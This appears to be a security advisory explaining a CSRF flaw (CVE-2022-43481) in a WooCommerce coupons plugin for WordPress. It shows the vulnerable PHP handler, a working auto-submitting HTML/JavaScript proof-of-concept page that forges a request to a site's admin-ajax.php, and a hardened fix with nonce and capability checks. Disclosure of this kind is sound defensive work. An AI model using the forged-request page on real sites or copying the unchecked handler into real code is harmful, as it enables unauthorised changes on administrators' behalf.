A Cross-Site Request Forgery (CSRF) vulnerability has been discovered in the Advanced Coupons for WooCommerce Coupons plugin (version <= 4.5) on WordPress. This security flaw allows an attacker to make unwarranted changes to the plugin settings leading to dismissal of notices. In this post, we will explore the details of the vulnerability, provide a code snippet to understand its implications, and link relevant references for further inspection.

Exploit Details

The Advanced Coupons for WooCommerce Coupons plugin is a popular extension that provides advanced features for managing and creating discount coupons on WooCommerce-based stores. The discovered vulnerability (CVE-2022-43481) lies in the plugin's handling of notice dismissal requests through the 'acfw_dismiss_notice' AJAX action.

Because the handler performs no nonce or capability check, an attacker can exploit it by tricking an authenticated administrator into loading a page that submits the dismissal request on the administrator's behalf. This results in the unwanted dismissal of notices, which may cause the administrator to miss important alerts and updates.

The following code snippet demonstrates the vulnerability in the 'acfw_dismiss_notice' AJAX action:

// Vulnerable handler: no nonce verification and no capability check
// before a request is allowed to modify plugin options.
function acfw_dismiss_notice() {
	if ( ! empty( $_POST['notice'] ) ) {
		// Input is sanitized, but the request's origin is never verified.
		$notice = sanitize_text_field( $_POST['notice'] );
		update_option( 'acfw_dismissed_' . $notice, 1 );
	}
	wp_die();
}

As seen in the code above, the function 'acfw_dismiss_notice' reads the notice identifier from the 'notice' POST parameter, sanitizes it, and then updates the corresponding option in the WordPress database. However, it performs neither nonce verification nor a capability check, so any request that carries the administrator's session cookie is accepted, which makes it susceptible to CSRF attacks.

Proof of Concept (PoC)

To exploit this vulnerability, an attacker could create a malicious HTML page that sends a request to the 'acfw_dismiss_notice' AJAX action when visited by an authenticated administrator. A sample PoC is shown below:

<!DOCTYPE html>
<html>
  <body>
    <h1>Malicious Page</h1>
    <script>
      function exploit() {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://targetsite.com/wp-admin/admin-ajax.php", true);
        xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
        xhr.send("action=acfw_dismiss_notice&notice=important_notice");
      }
      exploit();
    </script>
  </body>
</html>

Mitigation

To mitigate the vulnerability, it is important to implement both nonce verification and capability checks for the 'acfw_dismiss_notice' AJAX action.
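A hardened version of the handler, added here as an illustration of both checks (it is not the plugin's actual patch). The nonce action name 'acfw_dismiss_notice_nonce', the script handle 'acfw-notices', the 'acfwNotices' JavaScript object and the 'manage_woocommerce' capability are assumptions:

```php
<?php
// Added example, not the plugin's own code. Assumed names: the nonce action
// 'acfw_dismiss_notice_nonce', the script handle 'acfw-notices' and the
// 'acfwNotices' object handed to the admin page's JavaScript.

// 1. Give the admin-side script a per-session nonce to include in its request.
//    The script is expected to POST:
//      action=acfw_dismiss_notice&notice=<id>&nonce=<acfwNotices.nonce>
add_action( 'admin_enqueue_scripts', function () {
	wp_enqueue_script( 'acfw-notices', plugins_url( 'js/notices.js', __FILE__ ), array( 'jquery' ), '1.0', true );
	wp_localize_script( 'acfw-notices', 'acfwNotices', array(
		'ajaxUrl' => admin_url( 'admin-ajax.php' ),
		'nonce'   => wp_create_nonce( 'acfw_dismiss_notice_nonce' ),
	) );
} );

// 2. Verify the nonce and the caller's capability before touching any option.
function acfw_dismiss_notice() {
	// Ends the request with "-1" / HTTP 403 unless the 'nonce' field carries a
	// valid nonce for this action. A cross-site page cannot read that value,
	// so a forged request fails here.
	check_ajax_referer( 'acfw_dismiss_notice_nonce', 'nonce' );

	// Only users allowed to manage the store may dismiss its admin notices.
	if ( ! current_user_can( 'manage_woocommerce' ) ) {
		wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
	}

	// Same sanitization as before, with the slashes WordPress adds removed first.
	$notice = isset( $_POST['notice'] ) ? sanitize_text_field( wp_unslash( $_POST['notice'] ) ) : '';
	if ( '' === $notice ) {
		wp_send_json_error( array( 'message' => 'Missing notice identifier.' ), 400 );
	}

	update_option( 'acfw_dismissed_' . $notice, 1 );
	wp_send_json_success();
}
// Registered for logged-in users only; no 'wp_ajax_nopriv_' hook is added.
add_action( 'wp_ajax_acfw_dismiss_notice', 'acfw_dismiss_notice' );
```

With these checks in place, the PoC page above is rejected at check_ajax_referer() because it cannot supply a valid nonce, and a logged-in user without the required capability is rejected before any option is changed.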

References

1. CVE Identifier: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43481
2. WordPress Plugin Repository: https://wordpress.org/plugins/advanced-coupons-for-woocommerce-free/
3. WooCommerce: https://woocommerce.com/

Conclusion

Keeping plugins up to date and ensuring the use of secure coding practices are vital steps towards maintaining the security and integrity of your WordPress website. By staying informed of vulnerabilities like CVE-2022-43481 and applying the necessary mitigations, you can better protect your website and its users.

Timeline

Published on: 11/08/2022 19:15:00 UTC
Last modified on: 11/09/2022 13:54:00 UTC